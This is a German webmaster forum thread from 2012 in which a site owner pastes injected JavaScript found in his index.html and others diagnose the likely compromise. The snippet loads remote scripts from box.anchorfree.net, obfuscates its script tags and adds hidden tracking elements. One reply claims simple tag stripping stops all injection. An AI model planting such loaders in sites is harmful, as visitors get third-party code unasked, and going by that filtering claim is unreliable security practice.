Wie kommt das in Mein Code?

**Soul** · 29.01.2012, 20:19

Und irgendwie verweist meine Seite auf Livejasmin wie es ausschaut.

Habe defintiv kein Link nach da gesetzt und das schon mal gar nicht?

Gut mir fehlt noch viele an Erfahrung.

Aber das habe ich niemals eingebaut jemand ne Idee wie sowas passieren kann?

Code:

<script type="text/javascript">ANCHORFREE_VERSION="6212201711"</script><script type='text/javascript'>var _AF2$={'SN':'HSSHIELD00DE','IP':'69.31.101.201','CH':'HSSCNL000247','CT':'0','HST':'','AFH':'hss68','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'2.24','fbw':false,'FBWCNT_FIREFOX':0};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null&&_AF2$.CH!='HSSCNL000242'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");</script><style type='text/css'>AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank" id="AFhss_trk0" name="AFhss_trk0" style="display:none" /><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script type='text/javascript'>if(_AF2$.TOP==1){if(_AF2$.CH=='HSSCNL000242'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else if(_AF2$.CH=='HSSCNL000248'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/60f.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else if(_AF2$.CH=='HSSCNL000249'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/61f.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}else{var m=new RegExp(/&FBWCNT_FIREFOX=([0-9]+)/g).exec(_AF2$.HST);_AF2$.FBWCNT_FIREFOX=(m!=null&&typeof(m[1])!='undefined')?parseInt(m[1]):0;if(parseFloat(_AF2$.AFVER)>=2.03&&/NO_FBW_FIREFOX/.test(_AF2$.HST)==false&&_AF2$.FBWCNT_FIREFOX<10&&navigator.appVersion.indexOf("Win")!=-1){_AF2$.strl=1998;_AF2$.fbw=true}document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/62fbw-f2.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}}</script>

**Enjoy** · 29.01.2012, 22:57

Dann hat man wohl deinen Server gehakt, gehe mal alle Web's durch, ob du noch etwas findest

**andy** · 30.01.2012, 03:36

da waeren wir wieder bei trojaner, virus, umleitungsfehler.......

ich wuerde echt mal deine pc's richtig durchchecken.

wenn du das nicht im griff hast, solltest du nie wichtige zugaenge , bzw. passworte im browser speichern.
ein trojaner kann dir ganz einfach all diese gespeicherten passworte auslesen, und schickt sie zu seinem herchen ....
der fummelt dann auf deinem pc und auf deinen servern bischen rum.

dan wuerde ich mich eh mal an den jasmin support wenden, weil entweder wird ja auch ne ref id uebergeben, womit man den taeter identivizieren kann. wenn nicht, muesste das ja von dem verein selbst in auftrag gegeben worden sein.

nur zum spass unterstuetzt ja kein haecker irgendein pp, sonst kaeme ne dumme meldung wir zb: "der hacker ist der cracker" :)

oder mal in par ami foren posten, vielleicht bist da nicht der einzige....

**Captain** · 30.01.2012, 06:21

Um da zu helfen braucht man mehr angaben...

eigener server ? Hosting paket ? welches system nutzt du ? WP ? Joomla ? statisches Html ?

Du machst immer zu wenig angaben um dir was sagen zu können. Wir sind ja gerne bereit zu helfen, aber es ist mühsam dir jede angabe aus der nase zu ziehen.

Wir haben alle angefangen, und daher helfen wir auch gerne, vor allem wenn man freundlich ist und offen.

C.

**magan** · 30.01.2012, 07:30

bezüglich trojaner kann ich nur empfehlen das betriebssystem zu wechseln und das problem sollte sich erledigt haben.
ansonsten könnte es sich hier drum handeln dass in deinem script eine lücke ist die jemand genutzt hat - dazu muss man aber wissen was du da installiert hast... *glaskugelputz*

**Soul** · 30.01.2012, 08:48

Habe komplett alles durch gecheckt. Mit Spy-Bot, Tune up und einigen anderen Programmen habe Antivir drauf und nichts offen was nicht muss. Downloade nur das was ich wirklich brauche. Auf dem Web habe ich 2 Domains die andere Domain ist ok.
K.a was hätte wer davon bei mir was zu machen wo ich doch so erfolgreich bin looool.
HTML
Habe keine zusätzlichen Ports geöffnet.
Regestry mehrmals kontrolliert etc. wurde absolut nichts gefunden.

Im Browser wird absolut nichts gespeichert und Passwörter liegt nicht eines auf den PC Browserverläufe etc werden nach jeden schliessen gelöscht.

Gebe die PW jedes mal Händisch vom Zettel aus Neu ein.

Ich wende mich mal an Kolido ob die was sagen können weil hab auch ne feste IP und an Jasmin Support auch mal.

Danke Sehr

**andy** · 30.01.2012, 10:05

du hast das auf einer ganz normalen html seite draufgehabt?
kein script, keine datenbank?

wenn du nur ein account hast bei kolido, dann kann es sein das ein anderer was gewurstelt hat, also da muesste sich einer durch ein anderen account den root zugang verschaft haben, dass er das von hand auf deine html seite einpflanzt.

war das nur auf der index.html, oder auch auf anderen seiten?

**nisel** · 30.01.2012, 10:21

Autsch da hat Andy ganz Recht... Wenn es auf einer HTML Seite ohne Script nen Angriff gab, so wurde dieser direkt über Deinen Server Account gemacht. Wenn es php betrifft, kann es auch lediglich eine Sicherheitslücke in einem Script sein. Checke mal alle Deine Formular Scripte, ob da evtl das Capcha richtig funzt, oder du gar keins hast, dann kam der Angriff sicherlich darüber. Die von Kolido sollten dir darüber genug Infos geben können.

**magan** · 30.01.2012, 11:08

bei formularen darf man nur bestimmte zeichen durchlassen dann gibts auch keine injektion!
entweder strip_tags oder besser preg_replace-filterung verwenden dann sollte da nichts mehr passieren...
< oder > kann man in entities umwandeln oder ganz rauswerfen - dann sind code-anweisungen schon nicht mehr möglich.

**Soul** · 30.01.2012, 13:22

Habe mit Kolido schon gesprochen es wurde am 27 oder 29 diesen Monats gemacht über direkten Zugriff habe alle Daten geändert schon.

Ja, war nur auf der Index.html

Danke

Rechner nochmals kontrolliert aber nichts drauf.

Danke nochmals